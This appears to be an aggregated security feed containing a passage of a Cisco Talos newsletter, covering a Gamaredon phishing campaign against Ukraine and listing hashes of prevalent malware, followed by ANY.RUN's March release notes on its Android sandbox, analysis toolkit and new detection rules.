  • Some of the top-targeted network vulnerabilities affect end-of-life (EOL) devices and therefore have no available patches, despite still being actively targeted by threat actors.

The one big thing 

Cisco Talos is actively tracking an ongoing campaign targeting users in Ukraine with malicious LNK files, which run a PowerShell downloader. The file names use Russian words related to the movement of troops in Ukraine as a lure. Talos assesses with medium confidence that this activity is associated with the Gamaredon threat actor group. 

Why do I care? 

The invasion of Ukraine is a common theme used by the Gamaredon group in their phishing campaigns and this campaign continues the use of this technique. The actor distributes LNK files compressed inside ZIP archives, usually disguising the file as an Office document and using names that are related to the invasion. 

So now what? 

Ways our customers can detect and block this threat are listed in this dedicated blog post.

Top security headlines of the week

Gootloader Malware Resurfaces in Google Ads for Legal Docs: Attackers target law professionals by hiding the infostealer in ads delivered via Google-based malvertising. (Dark Reading

UK threatens £100K-a-day fines under new cyber bill: The tech secretary revealed the landmark legislation’s full details for first time. (The Register

Hacker linked to Oracle Cloud intrusion threatens to sell stolen data: The alleged breach was linked to a critical vulnerability (Cybersecurity Dive

WordPress attackers hide malware in overlooked plugins directory: The Must-Use plugins (mu-plugins) directory is used to store essential plugins that are necessary for a site to run properly. (SC Magazine)

Can’t get enough Talos? 

I mean, bless you if that’s the case, because the Year in Review links in the opening section are probably enough to keep you going. But if you’re still thirsty for more, here’s what the press have been making of the Year in Review findings: 

Upcoming events where you can find Talos

Most prevalent malware files from Talos telemetry over the past week  

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
Typical Filename: VID001.exe
Detection Name: Simple_Custom_Detection  

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91 
MD5: 7bdbd180c081fa63ca94f9c22c457376 
Typical Filename: c0dwjdi6a.dll 
 VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1 
MD5: 3e10a74a7613d1cae4b9749d7ec93515
 
VirusTotal: https://www.virustotal.com/gui/file/5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1 
Typical Filename: IMG001.exe
 
Claimed Product: N/A
 
Detection Name: Win.Dropper.Coinminer::1201 

SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca
MD5: 71fea034b422e4a17ebb06022532fdde 
 
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details
Typical Filename: VID001.exe 
 
Claimed Product: N/A 
 
Detection Name: Coinminer:MBT.26mw.in14.Talos  

Cisco Talos Blog – ​Read More

Release Notes: Android VM, Pre-Installed Dev Tools, TI Reports & Enhanced Detection

March was a productive and exciting month for the ANY.RUN team. We’ve been working hard to improve both our sandbox platform and Threat Intelligence services — all to help you detect threats faster and stay ahead of cybercriminals. 

This month, we focused on expanding the environments available for malware analysis and making our threat detection even sharper. We also published fresh TI reports and introduced new signatures and rules to improve detection accuracy. 

Let’s take a quick tour of what’s new in ANY.RUN

Product Updates 

Android Environment Now Available for Sandbox Analysis 

It’s official! The update many security teams have been waiting for is here: ANY.RUN now offers Android OS in the Interactive Sandbox

You can now investigate Android malware in a real ARM-based sandbox and see exactly how a suspicious APK file behaves in a mobile environment. This means no more guessing, no more blind spots, and no need for separate mobile analysis tools. 

Read technical analysis of Salvador Stealer, a new Android banking malware

Coper analyzed inside ANY.RUN Android environment 

With this release, SOC teams, incident responders, and threat hunters can analyze Android threats faster and with greater accuracy, all within the familiar ANY.RUN interface. 

And here’s the best part: Android OS support is available to all users, including Free Plan users. 

Why it matters: 

  • It’s fast: No waiting for static scans or time-consuming reverse engineering.  
  • It’s interactive: Click, explore, and engage with the malware just like on a real Android device. Grant or deny permissions, trigger actions, and watch how the sample reacts. 
  • It’s detailed: Track every move the malware makes with process trees, MITRE ATT&CK mapping, and real-time network insights. 
  • It’s fully cloud-based: No extra setup required. Run Android malware investigations anytime, anywhere, directly in your browser. 
  • It’s built for teams: Generate structured reports, share findings, and collaborate efficiently across your security team. 

This update makes Android malware analysis easier, faster, and more accessible to everyone. 


Learn to analyze malware in a sandbox

Learn to analyze cyber threats

See a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis



New Pre-Installed Development Tools for Deep Malware Analysis 

We’ve introduced a new pre-installed software set in the Windows 10 VMs: the Development Toolkit, designed specifically for advanced malware analysis. 

With this update, users can now select the “Development” option when configuring their sandbox environment. This toolkit includes essential software like Python, Node.js, debuggers, decompilers, and reverse engineering tools, pre-installed and ready to use.  

It’s ideal for analyzing complex threats like Python-based malware, Node.js-based samples, or malware that requires deeper debugging and inspection. 

Pre-installed software set for deeper malware analysis 

What’s inside the Development Toolkit? 

  • Python (latest version) 
  • Node.js (latest version) 
  • DebugView 
  • Detect It Easy (DiE) 
  • dnSpy 
  • HxD Hex Editor 
  • Process Hacker 
  • x64dbg Debugger 
  • Wireshark PE 

This set removes the need to manually install research tools, making your analysis sessions faster, smoother, and more efficient. 

Threat Coverage Updates 

We’ve also boosted our threat detection and intelligence capabilities for more precise analysis. 

Suricata Rules 

In March, we expanded our network-based threat detection by adding 1,654 new Suricata rules. These rules enhance visibility over malicious domains, C2 infrastructure, and phishing campaigns. 

Key updates include: 

  • Identification of 2 domains associated with Pentagon-related infrastructure. 

New Behavior Signatures 

In March, we added a total of 64 new behavior-based detection signatures to improve malware visibility and detection accuracy. These signatures cover mutex findings, suspicious activity patterns, C2 communications, and detections for popular malware families. 

Highlights from this update include: 

  • VANHELSING malware 
  • Wormlocker 
  • ScreenConnect abuse 
  • Advanced Installer misuse 
  • HatVibe malware 
  • VANHELSING detection (additional session) 
  • GRANDOREIRO banking trojan 
  • SVCSTEALER mutex detection 
  • DINODASRAT detection 
  • MINSTLOADER detection (script-based) 

Additionally, behavior signatures were introduced to detect: 

  • C2 communications related to Pentagon infrastructure (requires MITM analysis) 
  • HTTP requests linked to Sneaky2FA phishing activity 
  • domains spoofing e-zpass 
  • suspicious activity and evasion techniques 

New YARA Rule Updates 

To further strengthen static detection and classification, we added 5 new YARA rules in March. These rules improve the identification of emerging malware families and suspicious behavior patterns. 

New TI Reports Published 

TI Reports get you up to speed on the latest cyber threats targeting businesses

In March, we expanded our Threat Intelligence library with three new reports covering the latest activity of active APT groups. These reports provide valuable insights into real-world attacks, tools, and indicators to help security teams detect and respond to emerging threats. 

Here’s what’s new: 

  • Salt Typhoon Attacks: An in-depth report on a Chinese state-sponsored cyber espionage group active since 2019. The report highlights the group’s long-term, covert operations targeting government entities, critical infrastructure, and telecommunications providers across Southeast Asia, North America, and Africa. 
  • Dark Caracal Attacks: A collection of IOCs and malware samples linked to Dark Caracal, a threat actor known for global cyber-espionage campaigns. The report focuses on recent activities, targeted sectors, and indicators to help identify similar threats. 
  • UAC-0063 Attacks: A detailed analysis of UAC-0063, an APT group known for persistent and targeted attacks. The report includes IOCs, malware samples, YARA, and SIGMA rules to help defenders spot related malicious activity. 


Enrich your threat knowledge with TI Lookup

Learn to Track Emerging Cyber Threats

Check out expert guide to collecting intelligence on emerging threats with TI Lookup



About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

The post Release Notes: Android VM, Pre-Installed Dev Tools, TI Reports & Enhanced Detection appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More